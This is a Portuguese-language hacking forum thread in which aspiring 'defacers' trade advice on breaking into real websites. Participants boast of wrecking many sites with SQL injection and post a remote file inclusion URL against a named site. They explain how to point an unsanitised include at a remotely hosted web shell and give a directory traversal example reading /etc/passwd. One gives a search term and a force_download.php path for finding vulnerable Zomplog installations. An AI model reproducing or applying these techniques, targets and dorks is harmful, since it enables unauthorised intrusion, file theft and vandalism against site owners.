[Dúvida]Sobre Defacement..

[Anonymous]

Eh..tava vendo isso agora! =)
to procurando uns artigos de SQL Injection,ja ferrei um monte de sites!  :-\

Abç!

[HadeS]

Desculpa ai me meter.

Mas você disse que queria saber pra ter conhecimentos, certo.

Mas por que isso:

to procurando uns artigos de SQL Injection,ja ferrei um monte de sites!

?!? Oo

Não acha legal só pegar acesso, ver como funciona e sair? Acho que vai progredir mais...

HadeS

[Anonymous]

não cara,li vários textos sobre SQL Injection,ver como funciona e tal..
Se eu só ferrasse o site e sair,iria estar agindo como um super-hiper-mega lammer! 

[Anonymous]

Desculpa o double post,
mas => http://www.joshuahomes.com/main.php?pag ... txt?  ;D

[branco]

aehaehaeh aee garoto, aprendendo rapido =p

ta virando hacker em, gratz !

[Wuefez]

BackOff, tipo vou te dar um conselho de defacer, quando você acha algo vuln, você faz algo pra mostrar aos seus amigos que tem o acesso tipo cria uma pagina sua no site, mas nao passa o acesso como você passou acima do joshuahomes.com...

Quando eu entrei nesse topico nao pensei que ia ganhar mais um bot degraça pra minha botnet..
kkk

[Anonymous]

ah eh?
vo fazer isso da proxima vez,
vlw Wuefez,
tenho outra duvida 

tpw..
eu acesso www.site.com.br/index.php?pagefill=http ... arkers.txt?

e a cmd não carrega,tem algum outro jeito de tentar entrar no site sem ser pela cmd???

[Wuefez]

BackOff,

A CMD só funciona quando o script que você esta tentando explorar, possui uma variavel dentro de um include ou require não declarada anteriormente, ou seja o script tem que possuir algo como include "$coisa" pra depois você ir a acessar http://site.com/script.php?coisa=http://suacmd...

Vulnerabilidades de directory transversal são muito mais comuns de que de remote file inclusion, pesquise sobre isso!

[]'s

[HadeS]

Po Wuefez, sempre achei Direcroty Transversal mas difícil de achar do que RFI... =/

HadeS

[Anonymous]

BackOff,

A CMD só funciona quando o script que você esta tentando explorar, possui uma variavel dentro de um include ou require não declarada anteriormente, ou seja o script tem que possuir algo como include "$coisa" pra depois você ir a acessar http://site.com/script.php?coisa=http://suacmd...

Vulnerabilidades de directory transversal são muito mais comuns de que de remote file inclusion, pesquise sobre isso!

[]'s

procurei sobre directory transversal e remote file inclusion

but;não achei muita coisa

remote file inclusion eu entendi;
ex

include"$page";
?>

se tiver isso a pagina deve ser vulneravel,
--
mas e directory transversal? oq tem de diferente? 

[HadeS]

É parecido.

Mas no Directory Tansversal você aponta pra um arquivo no próprio servidor.

Exemplo: www.google.com.br/pagina_bug.php?dir=.. ... etc/passwd

Entendeu?

HadeS

[Anonymous]

Oi pessoal! ^^

Sou aprendiz de defacer,e tenho uma dúvida..por exemplo:
ao ler esse tópico,vi a cmd do Darkers^^ ae começei a usar ela..
fui testar,
ai apareçeu isso: (eu ja vi isso em outra cmd q eu usava,mas dai eu dava refresh e a cmd apareçia)

Warning: main(include/http://nershess.orgfree.com/darkers.txt.php): failed to open stream: No such file or directory in /home/sct/www/v3/index.php on line 323

Warning: main(): Failed opening 'include/http://nershess.orgfree.com/darkers.txt.php' for inclusion (include_path='.:/usr/share/pear') in /home/sct/www/v3/index.php on line 323

alguem sabe o que foi?

Att;
Phoeniix

[branco]

amigo esses são erros dos sites que você está tentando utilizar a cmd, é normal relex =]
geralmente os erros acontecem porque a cmd causa conflitos com alguns itens do site,

até mais

[Anonymous]

amigo esses são erros dos sites que você está tentando utilizar a cmd, é normal relex =]
geralmente os erros acontecem porque a cmd causa conflitos com alguns itens do site,

até mais

ah sim..
vlw branco!
poxa..ta dificil pakas achar um site vulneravel..

[HadeS]

Se quiser um Transversal, procura por "Powered by Zomplog".

Ai coloca /upload/force_download.php?file=(ARQUIVO) .

Pronto!

Mais uma simples receita de bolo.

HadeS